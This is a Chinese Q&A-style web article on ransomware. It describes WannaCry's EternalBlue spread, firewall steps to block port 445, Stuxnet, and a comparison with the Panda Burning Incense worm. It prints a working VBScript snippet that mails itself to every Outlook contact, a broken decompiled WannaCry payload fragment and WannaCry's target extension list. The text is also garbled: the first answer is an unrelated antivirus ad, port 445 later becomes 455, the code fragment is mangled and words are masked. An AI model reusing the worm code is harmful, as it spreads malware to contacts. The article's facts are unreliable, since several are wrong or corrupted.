文章大纲：

• 1、如何操作才会中比特币病毒
• 2、电脑中了勒索病毒会有什么反应？
• 3、电脑病毒比拼，比特币和熊猫烧香有哪些相似与不同？

如何操作才会中比特币病毒

可以直接腾讯电脑管家查杀

操作起来也很简便的，查杀木马病毒也很快速哦！我们安装登录后在主页面最下面找到第二个快捷功能键，点击进入就可以享受到它强大的查杀效果啦。右上角还有轻巧模式和传统模式相互切换的键呢，我们可以选择自己喜欢的操作界面哦！

电脑中了勒索病毒会有什么反应？

勒索病毒一般指WannaCry。

WannaCry（想哭，又叫Wanna Decryptor），一种“蠕虫式”的勒索病毒软件，大小3.3MB，由不法分子利用NSA（National Security Agency，美国国家安全局）泄露的危险漏洞“EternalBlue”（永恒之蓝）进行传播。

该恶意软件会扫描电脑上的TCP 445端口(Server Message Block/ *** B)，以类似于蠕虫病毒的方式传播，攻击主机并加密主机上存储的文件，然后要求以比特币的形式支付赎金。勒索金额为300至600美元。

2017年5月14日，WannaCry 勒索病毒出现了变种：WannaCry 2.0，取消Kill Switch 传播速度或更快。截止2017年5月15日，WannaCry造成至少有150个国家受到 *** 攻击，已经影响到金融，能源，医疗等行业，造成严重的危机管理问题。中国部分Window操作系统用户遭受感染，校园网用户首当其冲，受害严重，大量实验室数据和毕业设计被锁定加密。

目前，安全业界暂未能有效破除该勒索软件的恶意加密行为。微软总裁兼首席法务官Brad Smith称，美国国家安全局未披露更多的安全漏洞，给了犯罪组织可乘之机，最终带来了这一次攻击了150个国家的勒索病毒。

当用户主机系统被该勒索软件入侵后，弹出如下勒索对话框，提示勒索目的并向用户索要比特币。而对于用户主机上的重要文件，如：照片、图片、文档、压缩包、音频、视频、可执行程序等几乎所有类型的文件，都被加密的文件后缀名被统一修改为“.WNCRY”。目前，安全业界暂未能有效破除该勒索软的恶意加密行为，用户主机一旦被勒索软件渗透，只能通过重装操作系统的方式来解除勒索行为，但用户重要数据文件不能直接恢复。

目前，安全业界暂未能有效破除该勒索软件的恶意加密行为。 *** 安全专家建议，用户要断网开机，即先拔掉网线再开机，这样基本可以避免被勒索软件感染。开机后应尽快想办法打上安全补丁，或安装各家 *** 安全公司针对此事推出的防御工具，才可以联网。建议尽快备份电脑中的重要文件资料到移动硬盘、U 盘，备份完后脱机保存该磁盘，同时对于不明链接、文件和邮件要提高警惕，加强防范。

临时解决方案：

开启系统防火墙

利用系统防火墙高级设置阻止向445端口进行连接（该操作会影响使用445端口的服务）

打开系统自动更新，并检测更新进行安装

Win7、Win8、Win10的处理流程

1、打开控制面板-系统与安全-Windows防火墙，点击左侧启动或关闭Windows防火墙。

2、选择启动防火墙，并点击确定

3、点击高级设置

4、点击入站规则，新建规则

5、选择端口，下一步

6、特定本地端口，输入445，下一步

7、选择阻止连接，下一步

8、配置文件，全选，下一步

9、名称，可以任意输入，完成即可。

XP系统的处理流程

1、依次打开控制面板，安全中心，Windows防火墙，选择启用

2、点击开始，运行，输入cmd，确定执行下面三条命令：net stop rdr 、net stop srv 、net stop netbt

电脑病毒比拼，比特币和熊猫烧香有哪些相似与不同？

近年来的病毒，这里特指蠕虫病毒。

Stuxnet蠕虫，MS10-061，当蠕虫值入机器后，把自己设置成开机自启动，并释放驱动文件，把该驱动设置为服务自启动。该驱动负责突破系统TCP半开连接数限制，以方便蠕虫通过 *** 传播。感染系统的可移动驱动器（即U盘等），可通过U盘传播自身。通过MS10-061打印机服务远程代码执行漏洞在局域网传播自身。并尝试利用一些弱口令企图猜解并取得主机权限，危及整个 *** 的安全。为计算机设置了一个后门，不断尝试连接远程黑 *** 务器，收集用户信息，接收黑客指令，并可获取黑客远程服务器木马并执行，带来严重安全隐患。

熊猫烧香对我来说有点久远，虽然我有初始的蠕虫病毒，但没有解析关键的代码，只从 *** 中找到说是变了50次的变种一部分。

Set objOA=Wscript.CreateObject（"Outlook.Application"）

创建一个OUTLOOK应用的对象

Set objMapi=objOA.GetNameSpace（"MAPI"）

取得MAPI名字空间 For i=1 to objMapi.AddressLists.Count  遍历地址簿

Set objAddList=objMapi.AddressLists（i）For j=1 To objAddList. AddressEntries.Count

Set objMail=objOA.CreateItem （0）objMail.Recipients.Add （objAddList. AddressEntries （j）

取得收件人邮件地址

objMail.Subject=" 你好!"

设置邮件主题

objMail.Body="这次给你的附件，是我的新文档！"

设置信件内容

objMail.Attachments.Add（“c:virus.vbs"）

把自己作为附件扩散出去

objMail.Send

发送邮件

Next

Next

Set objMapi=Nothing

Set objOA=Nothing

这块是源码的传播方式，其实是劫持了邮箱的账号密码，自动发送邮件给好友，其实附件带的就是病毒复制体了。与最近的比特币病毒相关的也只有在局域网中通过455端口迅速感染。

它的感染方式主要是通过下载，病毒会删除ghost文件，并对文档的图片进行更换，不会对文件造成损坏。

而比特币病毒不同。

WannaCry木马利用泄漏的方程式工具包中的“永恒之蓝”漏洞工具从MS17_010漏洞进行 *** 端口（455端口）扫描攻击，目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染，并作为攻击机再次扫描互联网和局域网其他机器，行成蠕虫感染大范围超快速扩散。

木马母体为mssecsvc.exe，运行后会扫描随机ip的互联网机器，尝试感染，也会扫描局域网相同网段的机器进行感染传播，此外会释放敲诈者程序tasksche.exe，对磁盘文件进行加密勒索。

V1=0;

Do

{

P_payload=payload_x86;

If(v1)

P_payload=payload_x64;

V3=*(void **)FileName[4*v1=260];

（v11+v1)=(int)v3;

memcpy(v3,p_payload,v1!=0?51364:16480);

*(v11+v1)+=v1!=0?513634:16480;

++v1

}

While(v12);

V4+CreateFileA(FileName,0*8000000u,1u,03u,4u,0);

这个就是利用MS17_010的数据了，这个锅只能背给不更新补丁的人了。

木马加密使用AES加密文件，并使用非对称加密算法RSA 2048加密随机密钥，每个文件使用一个随机密钥，下面就是密码学的概率了，就和当初二战时期德军的恩尼格玛密码机一样，每一天的密码算法是天文数字，除非得到密钥，其余不可能破解。

熊猫烧香是不会损害文件的，但这个是可以的。

.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xl *** , .xl *** , .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .pp *** , .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .a *** , .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der

这些都是病毒会攻击的文档后缀。

和熊猫不同的是，它会通过tor匿名，监听9050端口，通过本地 *** 通信实现与服务器连接。